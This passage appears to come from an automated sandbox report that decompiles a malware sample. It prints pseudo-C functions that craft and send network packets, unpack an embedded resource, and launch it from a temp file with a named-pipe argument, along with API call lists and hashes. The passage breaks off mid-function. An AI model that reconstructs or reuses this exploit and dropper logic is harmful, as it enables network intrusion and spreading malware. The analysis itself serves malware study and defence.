                                                                                                          				_t66 = HeapAlloc(GetProcessHeap(), 8, 0x2d);
                                                                                                          				_v16 = _t66;
                                                                                                          				if(_t66 == 0) {
                                                                                                          					L12:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                          					goto L13;
                                                                                                          				}
                                                                                                          				_t57 = 9;
                                                                                                          				_t42 = memcpy(_t66,  *_a8, _t57 << 2);
                                                                                                          				__imp__#9(0x29);
                                                                                                          				_t77 = _v16;
                                                                                                          				 *(_t77 + 2) = _t42;
                                                                                                          				_t44 =  *_a12;
                                                                                                          				 *((char*)(_t77 + 8)) = 4;
                                                                                                          				 *((char*)(_t77 + 0x24)) = 3;
                                                                                                          				 *((short*)(_t77 + 0x25)) = _t44;
                                                                                                          				__imp__#19(_a4, _t77, 0x2d, 0); // executed
                                                                                                          				if(_t44 > 0) {
                                                                                                          					__imp__#16(_a4, _v12, 0xffff, 0); // executed
                                                                                                          					if(_t44 > 0) {
                                                                                                          						_t47 = _v12;
                                                                                                          						if( *((intOrPtr*)(_t47 + 9)) == 0) {
                                                                                                          							 *_a12 = 0;
                                                                                                          							memset(_t47, 0, 0xffff);
                                                                                                          							_t50 = HeapAlloc(GetProcessHeap(), 8, 0x27);
                                                                                                          							_a12 = _t50;
                                                                                                          							if(_t50 != 0) {
                                                                                                          								_t60 = 9;
                                                                                                          								_t51 = memcpy(_t50,  *_a8, _t60 << 2);
                                                                                                          								__imp__#9(0x23);
                                                                                                          								_t79 = _a12;
                                                                                                          								 *(_t79 + 2) = _t51;
                                                                                                          								 *((char*)(_t79 + 8)) = 0x71;
                                                                                                          								__imp__#19(_a4, _t79, 0x27, 0);
                                                                                                          								if(_t51 > 0) {
                                                                                                          									_t74 = _v12;
                                                                                                          									__imp__#16(_a4, _t74, 0xffff, 0);
                                                                                                          									if(_t51 > 0 &&  *((intOrPtr*)(_t74 + 9)) == 0) {
                                                                                                          										 *((short*)( *_a8 + 0x1c)) = 0;
                                                                                                          										_v5 = 1;
                                                                                                          									}
                                                                                                          								}
                                                                                                          								HeapFree(GetProcessHeap(), 8, _t79);
                                                                                                          								_t77 = _v16;
                                                                                                          							}
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				HeapFree(GetProcessHeap(), 8, _t77);
                                                                                                          				goto L12;
                                                                                                          			}


















                                                                                                          0x04a421f1
                                                                                                          0x04a421fe
                                                                                                          0x04a42200
                                                                                                          0x04a42205
                                                                                                          0x04a4233b
                                                                                                          0x04a42341
                                                                                                          0x04a42341
                                                                                                          0x04a42215
                                                                                                          0x04a42217
                                                                                                          0x04a4221c
                                                                                                          0x04a4232c
                                                                                                          0x04a42334
                                                                                                          0x00000000
                                                                                                          0x04a4233a
                                                                                                          0x04a42229
                                                                                                          0x04a4222c
                                                                                                          0x04a4222e
                                                                                                          0x04a42234
                                                                                                          0x04a4223b
                                                                                                          0x04a42242
                                                                                                          0x04a42249
                                                                                                          0x04a4224d
                                                                                                          0x04a42251
                                                                                                          0x04a42255
                                                                                                          0x04a4225d
                                                                                                          0x04a42271
                                                                                                          0x04a42279
                                                                                                          0x04a4227f
                                                                                                          0x04a42286
                                                                                                          0x04a42294
                                                                                                          0x04a42297
                                                                                                          0x04a422a6
                                                                                                          0x04a422ac
                                                                                                          0x04a422b1
                                                                                                          0x04a422ba
                                                                                                          0x04a422bf
                                                                                                          0x04a422c1
                                                                                                          0x04a422c7
                                                                                                          0x04a422d2
                                                                                                          0x04a422d6
                                                                                                          0x04a422da
                                                                                                          0x04a422e2
                                                                                                          0x04a422e4
                                                                                                          0x04a422f2
                                                                                                          0x04a422fa
                                                                                                          0x04a42309
                                                                                                          0x04a4230d
                                                                                                          0x04a4230d
                                                                                                          0x04a422fa
                                                                                                          0x04a42317
                                                                                                          0x04a4231d
                                                                                                          0x04a4231d
                                                                                                          0x04a422b1
                                                                                                          0x04a42286
                                                                                                          0x04a42279
                                                                                                          0x04a42326
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,74714F20,?,?,?,?,?,?,?,?), ref: 04A421F5
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A421FE
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000002D,?), ref: 04A42210
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A42213
                                                                                                          • htons.WS2_32(00000029), ref: 04A4222E
                                                                                                          • send.WS2_32(?,?,0000002D,00000000), ref: 04A42255
                                                                                                          • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04A42271
                                                                                                          • memset.MSVCRT ref: 04A42297
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000027), ref: 04A422A3
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A422A6
                                                                                                          • htons.WS2_32(00000023), ref: 04A422C1
                                                                                                          • send.WS2_32(?,?,00000027,00000000), ref: 04A422DA
                                                                                                          • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04A422F2
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 04A42314
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A42317
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 04A42323
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A42326
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 04A42331
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A42334
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocFree$htonsrecvsend$memset
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 821554539-636472023
                                                                                                          • Opcode ID: 9ba7e2a1e6751887571926a8c8092820ab3bbac18436160958f7cff3893c0dca
                                                                                                          • Instruction ID: 2283a422e27614f920591a5e3b8181214ee8c3d977330bd39152e4823a58ca63
                                                                                                          • Opcode Fuzzy Hash: 9ba7e2a1e6751887571926a8c8092820ab3bbac18436160958f7cff3893c0dca
                                                                                                          • Instruction Fuzzy Hash: 57417A35A00306BBEB109FA5DC09F9E7BB4EFD9750F008498F9489B280DB79E905CB61
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 72%
                                                                                                          			E04A47146(void* __ecx, void* __esi) {
                                                                                                          				long _v8;
                                                                                                          				char _v12;
                                                                                                          				void* _v16;
                                                                                                          				void* _v20;
                                                                                                          				void* _v32;
                                                                                                          				char _v36;
                                                                                                          				struct _PROCESS_INFORMATION _v52;
                                                                                                          				struct _STARTUPINFOW _v120;
                                                                                                          				short _v1680;
                                                                                                          				void _v3728;
                                                                                                          				short _v5776;
                                                                                                          				void* __ebx;
                                                                                                          				void* _t56;
                                                                                                          				void* _t57;
                                                                                                          				int _t59;
                                                                                                          				long* _t60;
                                                                                                          				char _t62;
                                                                                                          				char* _t64;
                                                                                                          				char* _t66;
                                                                                                          				void* _t68;
                                                                                                          				void* _t72;
                                                                                                          				char* _t73;
                                                                                                          				int _t90;
                                                                                                          				long _t95;
                                                                                                          				void* _t99;
                                                                                                          				signed int _t102;
                                                                                                          				intOrPtr _t103;
                                                                                                          				intOrPtr _t104;
                                                                                                          				void* _t105;
                                                                                                          				int _t109;
                                                                                                          				void* _t114;
                                                                                                          
                                                                                                          				_t99 = __ecx;
                                                                                                          				E04A4A760(0x168c);
                                                                                                          				_t95 = 0;
                                                                                                          				_v8 = 0;
                                                                                                          				_v12 = 0;
                                                                                                          				_t7 = (0 | E04A46F7C(_t99, GetCurrentProcess()) != 0x00000000) + 1; // 0x1, executed
                                                                                                          				_t56 = E04A48313(_t7,  &_v8,  &_v12); // executed
                                                                                                          				if(_t56 != 0) {
                                                                                                          					_t57 = 0;
                                                                                                          					do {
                                                                                                          						_t8 = _t57 + L"C:\\Windows\\"; // 0x3a0043
                                                                                                          						_t102 =  *_t8 & 0x0000ffff;
                                                                                                          						 *(_t114 + _t57 - 0x68c) = _t102;
                                                                                                          						_t57 = _t57 + 2;
                                                                                                          					} while (_t102 != 0);
                                                                                                          					_t59 = GetTempFileNameW( &_v1680, 0, 0,  &_v1680); // executed
                                                                                                          					if(_t59 == 0) {
                                                                                                          						L16:
                                                                                                          						_t103 = _v12;
                                                                                                          						_t60 = _v8;
                                                                                                          						if(_t103 == _t95) {
                                                                                                          							L18:
                                                                                                          							_t62 = RtlFreeHeap(GetProcessHeap(), _t95, _v8); // executed
                                                                                                          							return _t62;
                                                                                                          						} else {
                                                                                                          							goto L17;
                                                                                                          						}
                                                                                                          						do {
                                                                                                          							L17:
                                                                                                          							 *_t60 = _t95;
                                                                                                          							_t60 =  &(_t60[0]);
                                                                                                          							_t103 = _t103 - 1;
                                                                                                          						} while (_t103 != 0);
                                                                                                          						goto L18;
                                                                                                          					}
                                                                                                          					_v36 = 0;
                                                                                                          					asm("stosd");
                                                                                                          					asm("stosd");
                                                                                                          					asm("stosd");
                                                                                                          					_t64 =  &_v36;
                                                                                                          					__imp__CoCreateGuid(_t64, _t105); // executed
                                                                                                          					if(_t64 < 0) {
                                                                                                          						L15:
                                                                                                          						goto L16;
                                                                                                          					}
                                                                                                          					_t66 =  &_v36;
                                                                                                          					_v16 = 0;
                                                                                                          					__imp__StringFromCLSID(_t66,  &_v16); // executed
                                                                                                          					if(_t66 < 0) {
                                                                                                          						goto L15;
                                                                                                          					}
                                                                                                          					_t68 = E04A46FAF(_v12,  &_v1680, _v8); // executed
                                                                                                          					if(_t68 == 0) {
                                                                                                          						L14:
                                                                                                          						__imp__CoTaskMemFree(_v16);
                                                                                                          						_t95 = 0;
                                                                                                          						goto L15;
                                                                                                          					}
                                                                                                          					wsprintfW( &_v3728, L"\\\\.\\pipe\\%ws", _v16);
                                                                                                          					_t72 = CreateThread(0, 0, E04A46FFE,  &_v3728, 0, 0); // executed
                                                                                                          					_v20 = _t72;
                                                                                                          					if(_t72 != 0) {
                                                                                                          						asm("stosd");
                                                                                                          						asm("stosd");
                                                                                                          						asm("stosd");
                                                                                                          						asm("stosd");
                                                                                                          						_t109 = 0x44;
                                                                                                          						memset( &_v120, 0, _t109);
                                                                                                          						_v120.wShowWindow = 0;
                                                                                                          						_v120.cb = _t109;
                                                                                                          						wsprintfW( &_v5776, L"\"%ws\" %ws",  &_v1680,  &_v3728);
                                                                                                          						_t90 = CreateProcessW( &_v1680,  &_v5776, 0, 0, 0, 0x8000000, 0, 0,  &_v120,  &_v52); // executed
                                                                                                          						if(_t90 != 0) {
                                                                                                          							WaitForSingleObject(_v52, 0xea60);
                                                                                                          							E04A46CC8( *0x4a57b80);
                                                                                                          							TerminateThread(_v20, 0); // executed
                                                                                                          						}
                                                                                                          						CloseHandle(_v20);
                                                                                                          					}
                                                                                                          					_t104 = _v12;
                                                                                                          					_t73 = _v8;
                                                                                                          					if(_t104 == 0) {
                                                                                                          						L13:
                                                                                                          						E04A46FAF(_v12,  &_v1680, _v8); // executed
                                                                                                          						DeleteFileW( &_v1680); // executed
                                                                                                          						goto L14;
                                                                                                          					} else {
                                                                                                          						do {
                                                                                                          							 *_t73 = 0;
                                                                                                          							_t73 = _t73 + 1;
                                                                                                          							_t104 = _t104 - 1;
                                                                                                          						} while (_t104 != 0);
                                                                                                          						goto L13;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _t56;
                                                                                                          			}


































                                                                                                          0x04a47146
                                                                                                          0x04a4714e
                                                                                                          0x04a4715b
                                                                                                          0x04a4715e
                                                                                                          0x04a47161
                                                                                                          0x04a47177
                                                                                                          0x04a4717a
                                                                                                          0x04a47181
                                                                                                          0x04a47187
                                                                                                          0x04a47189
                                                                                                          0x04a47189
                                                                                                          0x04a47189
                                                                                                          0x04a47190
                                                                                                          0x04a47198
                                                                                                          0x04a4719b
                                                                                                          0x04a471aa
                                                                                                          0x04a471b2
                                                                                                          0x04a47318
                                                                                                          0x04a47318
                                                                                                          0x04a4731b
                                                                                                          0x04a47320
                                                                                                          0x04a47328
                                                                                                          0x04a47333
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a47322
                                                                                                          0x04a47322
                                                                                                          0x04a47322
                                                                                                          0x04a47324
                                                                                                          0x04a47325
                                                                                                          0x04a47325
                                                                                                          0x00000000
                                                                                                          0x04a47322
                                                                                                          0x04a471bb
                                                                                                          0x04a471c1
                                                                                                          0x04a471c2
                                                                                                          0x04a471c3
                                                                                                          0x04a471c4
                                                                                                          0x04a471c8
                                                                                                          0x04a471d0
                                                                                                          0x04a47317
                                                                                                          0x00000000
                                                                                                          0x04a47317
                                                                                                          0x04a471da
                                                                                                          0x04a471de
                                                                                                          0x04a471e1
                                                                                                          0x04a471e9
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a471fc
                                                                                                          0x04a47203
                                                                                                          0x04a4730c
                                                                                                          0x04a4730f
                                                                                                          0x04a47315
                                                                                                          0x00000000
                                                                                                          0x04a47315
                                                                                                          0x04a4721f
                                                                                                          0x04a47236
                                                                                                          0x04a4723c
                                                                                                          0x04a47241
                                                                                                          0x04a4724c
                                                                                                          0x04a4724d
                                                                                                          0x04a4724e
                                                                                                          0x04a47251
                                                                                                          0x04a47252
                                                                                                          0x04a47259
                                                                                                          0x04a47260
                                                                                                          0x04a4727e
                                                                                                          0x04a47281
                                                                                                          0x04a472a6
                                                                                                          0x04a472ae
                                                                                                          0x04a472b8
                                                                                                          0x04a472c4
                                                                                                          0x04a472cd
                                                                                                          0x04a472cd
                                                                                                          0x04a472d6
                                                                                                          0x04a472d6
                                                                                                          0x04a472dc
                                                                                                          0x04a472df
                                                                                                          0x04a472e5
                                                                                                          0x04a472ed
                                                                                                          0x04a472fa
                                                                                                          0x04a47306
                                                                                                          0x00000000
                                                                                                          0x04a472e7
                                                                                                          0x04a472e7
                                                                                                          0x04a472e7
                                                                                                          0x04a472e9
                                                                                                          0x04a472ea
                                                                                                          0x04a472ea
                                                                                                          0x00000000
                                                                                                          0x04a472e7
                                                                                                          0x04a472e5
                                                                                                          0x04a4733b

                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00000000,?,04A47AF8), ref: 04A47164
                                                                                                            • Part of subcall function 04A46F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04A47170,00000000,?,04A47AF8), ref: 04A46F8E
                                                                                                            • Part of subcall function 04A46F7C: GetProcAddress.KERNEL32(00000000), ref: 04A46F95
                                                                                                            • Part of subcall function 04A48313: FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 04A4832A
                                                                                                            • Part of subcall function 04A48313: LoadResource.KERNEL32(00000000), ref: 04A48341
                                                                                                            • Part of subcall function 04A48313: LockResource.KERNEL32(00000000), ref: 04A48350
                                                                                                            • Part of subcall function 04A48313: SizeofResource.KERNEL32(00000000), ref: 04A48368
                                                                                                            • Part of subcall function 04A48313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04A48384
                                                                                                            • Part of subcall function 04A48313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 04A4838D
                                                                                                            • Part of subcall function 04A48313: memcpy.MSVCRT ref: 04A4839C
                                                                                                            • Part of subcall function 04A48313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 04A483B9
                                                                                                            • Part of subcall function 04A48313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 04A483BC
                                                                                                            • Part of subcall function 04A48313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 04A4840A
                                                                                                            • Part of subcall function 04A48313: RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 04A4840D
                                                                                                          • GetTempFileNameW.KERNELBASE(?,00000000,00000000,?,00000000,?,04A47AF8), ref: 04A471AA
                                                                                                          • CoCreateGuid.OLE32(?,747143E0,?,04A47AF8), ref: 04A471C8
                                                                                                          • StringFromCLSID.OLE32(?,?,?,04A47AF8), ref: 04A471E1
                                                                                                          • wsprintfW.USER32 ref: 04A4721F
                                                                                                          • CreateThread.KERNELBASE ref: 04A47236
                                                                                                          • memset.MSVCRT ref: 04A47259
                                                                                                          • wsprintfW.USER32 ref: 04A47281
                                                                                                          • CreateProcessW.KERNELBASE ref: 04A472A6
                                                                                                          • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 04A472B8
                                                                                                            • Part of subcall function 04A46CC8: EnterCriticalSection.KERNEL32(?,04A47B03), ref: 04A46CCD
                                                                                                            • Part of subcall function 04A46CC8: InterlockedExchange.KERNEL32(?,00000001), ref: 04A46CD9
                                                                                                            • Part of subcall function 04A46CC8: LeaveCriticalSection.KERNEL32(?), ref: 04A46CE0
                                                                                                          • TerminateThread.KERNELBASE(?,00000000), ref: 04A472CD
                                                                                                          • CloseHandle.KERNEL32(?), ref: 04A472D6
                                                                                                          • DeleteFileW.KERNELBASE(?,?,?), ref: 04A47306
                                                                                                          • CoTaskMemFree.OLE32(?,?,?,?,04A47AF8), ref: 04A4730F
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,04A47AF8), ref: 04A4732C
                                                                                                          • RtlFreeHeap.NTDLL(00000000,?,04A47AF8), ref: 04A47333
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$Resource$CreateFree$AllocateCriticalFileHandleSectionThreadwsprintf$AddressCloseCurrentDeleteEnterExchangeFindFromGuidInterlockedLeaveLoadLockModuleNameObjectProcSingleSizeofStringTaskTempTerminateWaitmemcpymemset
                                                                                                          • String ID: Oqt Uqt0Xqt$"%ws" %ws$\\.\pipe\%ws
                                                                                                          • API String ID: 1475553426-1840939701
                                                                                                          • Opcode ID: 8ccee4ddb56a39d3622c233f54ea1c3a5cee270680358f5e6d559dbf76f3e635
                                                                                                          • Instruction ID: 0a62675aa0562b0605025ac7ba905d9b45c490d3659c17094a6edb07174c04ec
                                                                                                          • Opcode Fuzzy Hash: 8ccee4ddb56a39d3622c233f54ea1c3a5cee270680358f5e6d559dbf76f3e635
                                                                                                          • Instruction Fuzzy Hash: 4551E5B9A00219AFEF119FA4DD84DEEB7BDEB98304F144566F505E2110EB39AE458B20
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 234 4a446c7-4a446f4 GetProcessHeap HeapAlloc 235 4a44aa4 234->235 236 4a446fa-4a44717 call 4a42497 234->236 237 4a44aab-4a44ab2 235->237 239 4a4471c-4a4471e 236->239 240 4a44724-4a4473f call 4a43449 239->240 241 4a447b1-4a447bd GetProcessHeap 239->241 240->241 245 4a44741-4a44743 240->245 241->237 246 4a44745-4a44756 call 4a42e12 245->246 247 4a4475a-4a4475c 245->247 246->241 252 4a44758 246->252 249 4a44761-4a44777 call 4a429a2 247->249 255 4a44779-4a44788 call 4a421dc 249->255 256 4a447cb 249->256 254 4a447ce-4a447e7 call 4a4317c 252->254 254->241 261 4a447e9-4a44800 GetProcessHeap HeapAlloc 254->261 262 4a447ae 255->262 263 4a4478a-4a447a6 Sleep call 4a42191 255->263 256->254 261->241 264 4a44802-4a44806 261->264 262->241 273 4a447c2-4a447c9 263->273 274 4a447a8-4a447ac 263->274 266 4a4480c-4a4481b GetProcessHeap HeapAlloc 264->266 267 4a44959-4a4495d 264->267 269 4a4481d-4a4486c call 4a43209 266->269 270 4a4487e-4a44882 266->270 271 4a449a6-4a449df GetProcessHeap HeapAlloc 267->271 272 4a4495f-4a44964 267->272 287 4a44872-4a44877 GetProcessHeap 269->287 288 4a4486e 269->288 276 4a44a91-4a44a9f GetProcessHeap 270->276 277 4a44888-4a448a4 Sleep GetProcessHeap HeapAlloc 270->277 271->270 280 4a449e5-4a44a3c call 4a433a4 271->280 272->271 279 4a44966-4a449a2 272->279 273->262 274->262 275 4a4475e 274->275 275->249 276->241 277->276 282 4a448aa-4a44928 call 4a432af GetProcessHeap 277->282 279->271 280->287 289 4a44a42-4a44a49 280->289 291 4a44a52-4a44a70 call 4a43680 282->291 294 4a4492e-4a4494e 282->294 287->270 288->287 289->291 297 4a44a72-4a44a88 call 4a441e9 291->297 298 4a44a8e 291->298 294->276 296 4a44954-4a44956 294->296 296->267 297->298 301 4a44a8a 297->301 298->276 301->298
                                                                                                          C-Code - Quality: 98%
                                                                                                          			E04A446C7(void* __ecx, intOrPtr _a4, void* _a8, char _a12, signed short* _a16, char _a20) {
                                                                                                          				signed int _v8;
                                                                                                          				void* _v12;
                                                                                                          				intOrPtr _v16;
                                                                                                          				signed int _v20;
                                                                                                          				signed int _v24;
                                                                                                          				void* __edi;
                                                                                                          				void* _t146;
                                                                                                          				intOrPtr _t151;
                                                                                                          				void* _t160;
                                                                                                          				intOrPtr _t172;
                                                                                                          				short _t173;
                                                                                                          				signed short _t174;
                                                                                                          				short _t202;
                                                                                                          				short _t205;
                                                                                                          				short _t218;
                                                                                                          				void* _t228;
                                                                                                          				signed int _t242;
                                                                                                          				void* _t248;
                                                                                                          				void* _t249;
                                                                                                          				void* _t251;
                                                                                                          				void _t252;
                                                                                                          
                                                                                                          				_t228 = __ecx;
                                                                                                          				_v8 = 0xc0c0c0c;
                                                                                                          				_t251 = HeapAlloc(GetProcessHeap(), 8, 0x90);
                                                                                                          				_v12 = _t251;
                                                                                                          				if(_t251 == 0) {
                                                                                                          					_v8 = 0xbadf00d;
                                                                                                          				} else {
                                                                                                          					_t246 = _a16;
                                                                                                          					 *_t251 = 0xf00d;
                                                                                                          					_t146 = E04A42497(_t228, _a4,  &_a12,  *_a16 & 0x0000ffff,  &_v12, _a20); // executed
                                                                                                          					if(_t146 != 0) {
                                                                                                          						_v20 =  *(_a12 + 0x22) & 0x0000ffff;
                                                                                                          						_t151 = E04A43449( &_v12, _a20);
                                                                                                          						_v16 = _t151;
                                                                                                          						if(_t151 != 0xffffffff) {
                                                                                                          							if(_t151 != 0) {
                                                                                                          								_t252 = 0;
                                                                                                          								while(E04A429A2(_a4,  &_a12,  *_t246 & 0x0000ffff,  &_v12) != 0) {
                                                                                                          									if(E04A421DC(_a4,  &_a12, _t246) == 0) {
                                                                                                          										L12:
                                                                                                          										_t251 = _v12;
                                                                                                          									} else {
                                                                                                          										Sleep(0x7d0);
                                                                                                          										if(E04A42191( &_a12, _a4, _a8, _t246) == 0) {
                                                                                                          											_v8 = 0xbadf00d;
                                                                                                          											goto L12;
                                                                                                          										} else {
                                                                                                          											_t252 = _t252 + 1;
                                                                                                          											if(_t252 < 0x10) {
                                                                                                          												_t246 = _a16;
                                                                                                          												continue;
                                                                                                          											} else {
                                                                                                          												goto L12;
                                                                                                          											}
                                                                                                          										}
                                                                                                          									}
                                                                                                          									goto L13;
                                                                                                          								}
                                                                                                          								_t251 = _v12;
                                                                                                          								goto L16;
                                                                                                          							} else {
                                                                                                          								if(E04A42E12(_a4, _a12,  *_t246 & 0x0000ffff) != 0) {
                                                                                                          									L16:
                                                                                                          									_v8 = 0xbadf00d;
                                                                                                          									if(E04A4317C(_t228, _a4,  &_a12,  *_t246 & 0x0000ffff) == 0) {
                                                                                                          										goto L13;
                                                                                                          									} else {
                                                                                                          										_t160 = HeapAlloc(GetProcessHeap(), 8, 0x100);
                                                                                                          										_a8 = _t160;
                                                                                                          										if(_t160 == 0) {
                                                                                                          											goto L13;
                                                                                                          										} else {
                                                                                                          											if(_v16 == 0) {
                                                                                                          												L28:
                                                                                                          												if(_a20 == 5 && 0 ==  *_t251) {
                                                                                                          													 *((short*)(_t251 + 0x6c)) = 0x1010;
                                                                                                          													 *((char*)(_t251 + 0x6e)) = 0x10;
                                                                                                          													 *(_t251 + 0x50) = 0x28e0;
                                                                                                          													 *((short*)(_t251 + 0x52)) = 0x7068;
                                                                                                          													 *((short*)(_t251 + 0x54)) = 0x8078;
                                                                                                          													 *((short*)(_t251 + 0x56)) = 0x9490;
                                                                                                          													 *((char*)(_t251 + 0x58)) = 0xaa;
                                                                                                          													 *(_t251 + 0x59) = 0xb4b8;
                                                                                                          													 *((short*)(_t251 + 0x5c)) = 0xbaa0;
                                                                                                          													 *((short*)(_t251 + 0x66)) = 0x4c40;
                                                                                                          													 *((char*)(_t251 + 0x68)) = 0x68;
                                                                                                          													 *((char*)(_t251 + 0x65)) = 0x10;
                                                                                                          												}
                                                                                                          												_t229 =  *(_t251 + 0x6d) & 0x000000ff;
                                                                                                          												asm("cdq");
                                                                                                          												asm("cdq");
                                                                                                          												_t242 = (( *(_t251 + 0x50) & 0x000000ff) + ( *(_t251 + 0x6d) & 0x000000ff) + 8) % ( *(_t251 + 0x6d) & 0x000000ff) % _t229;
                                                                                                          												 *(_t251 + 0x8a) = _t242;
                                                                                                          												 *((short*)(_t251 + 0x8c)) = _t242 + 0xd08;
                                                                                                          												_t248 = HeapAlloc(GetProcessHeap(), 8, 0x13);
                                                                                                          												if(_t248 == 0) {
                                                                                                          													goto L23;
                                                                                                          												} else {
                                                                                                          													 *((short*)(_t248 + 1)) = 0;
                                                                                                          													 *((short*)(_t248 + 3)) = 1;
                                                                                                          													 *((short*)(_t248 + 5)) = 0;
                                                                                                          													 *((short*)(_t248 + 7)) = 0;
                                                                                                          													 *((short*)(_t248 + 9)) = 0;
                                                                                                          													 *((short*)(_t248 + 0xb)) = 1;
                                                                                                          													_t202 = 0x34;
                                                                                                          													 *((short*)(_t248 + 0xd)) = _t202;
                                                                                                          													 *_t248 = 8;
                                                                                                          													 *((short*)(_t248 + 0xf)) = ( *(_t251 + 0x59) & 0x000000ff) +  *((intOrPtr*)(_t251 + 0x8c));
                                                                                                          													_t205 = 2;
                                                                                                          													 *((short*)(_t248 + 0x11)) = _t205;
                                                                                                          													if(E04A433A4(_t229, _a4, _a12,  *_a16 & 0x0000ffff, _t248, _a8, _t205) == 0) {
                                                                                                          														goto L22;
                                                                                                          													} else {
                                                                                                          														 *(_a12 + 0x22) = _v20;
                                                                                                          														goto L21;
                                                                                                          													}
                                                                                                          													L38:
                                                                                                          													HeapFree(GetProcessHeap(), 8, _a8);
                                                                                                          													goto L13;
                                                                                                          												}
                                                                                                          												goto L41;
                                                                                                          											} else {
                                                                                                          												_t248 = HeapAlloc(GetProcessHeap(), 8, 0x27);
                                                                                                          												if(_t248 != 0) {
                                                                                                          													 *((intOrPtr*)(_t248 + 8)) = 1;
                                                                                                          													 *((intOrPtr*)(_t248 + 0x18)) = 1;
                                                                                                          													 *_t248 = 0x12;
                                                                                                          													 *((intOrPtr*)(_t248 + 4)) = 0;
                                                                                                          													 *((intOrPtr*)(_t248 + 0xc)) = 0;
                                                                                                          													 *((intOrPtr*)(_t248 + 0x10)) = 0;
                                                                                                          													 *((intOrPtr*)(_t248 + 0x14)) = 0;
                                                                                                          													 *((intOrPtr*)(_t248 + 0x1c)) = 0x48;
                                                                                                          													 *((intOrPtr*)(_t248 + 0x20)) = ( *(_t251 + 0x88) & 0x0000ffff) + ( *(_t251 + 0x59) & 0x000000ff);
                                                                                                          													_t218 = 2;
                                                                                                          													 *((short*)(_t248 + 0x25)) = _t218;
                                                                                                          													if(E04A43209( *(_t251 + 0x59) & 0x000000ff, _a4, _a12,  *_a16 & 0x0000ffff, _t248, _a8, _t218) != 0) {
                                                                                                          														L21:
                                                                                                          														_v8 = _v8 & 0x00000000;
                                                                                                          													}
                                                                                                          													L22:
                                                                                                          													HeapFree(GetProcessHeap(), 8, _t248);
                                                                                                          												}
                                                                                                          											}
                                                                                                          											L23:
                                                                                                          											if(_v8 == 0) {
                                                                                                          												Sleep(0x7d0);
                                                                                                          												_t249 = HeapAlloc(GetProcessHeap(), 8, 0x29);
                                                                                                          												if(_t249 != 0) {
                                                                                                          													_t172 = 4;
                                                                                                          													 *((intOrPtr*)(_t249 + 4)) = _t172;
                                                                                                          													 *((intOrPtr*)(_t249 + 0xc)) = _t172;
                                                                                                          													 *((intOrPtr*)(_t249 + 0x14)) = _t172;
                                                                                                          													_t173 = 5;
                                                                                                          													 *((short*)(_t249 + 0x25)) = _t173;
                                                                                                          													_t174 = 7;
                                                                                                          													 *(_t249 + 0x27) = _t174;
                                                                                                          													 *_t249 = 0x13;
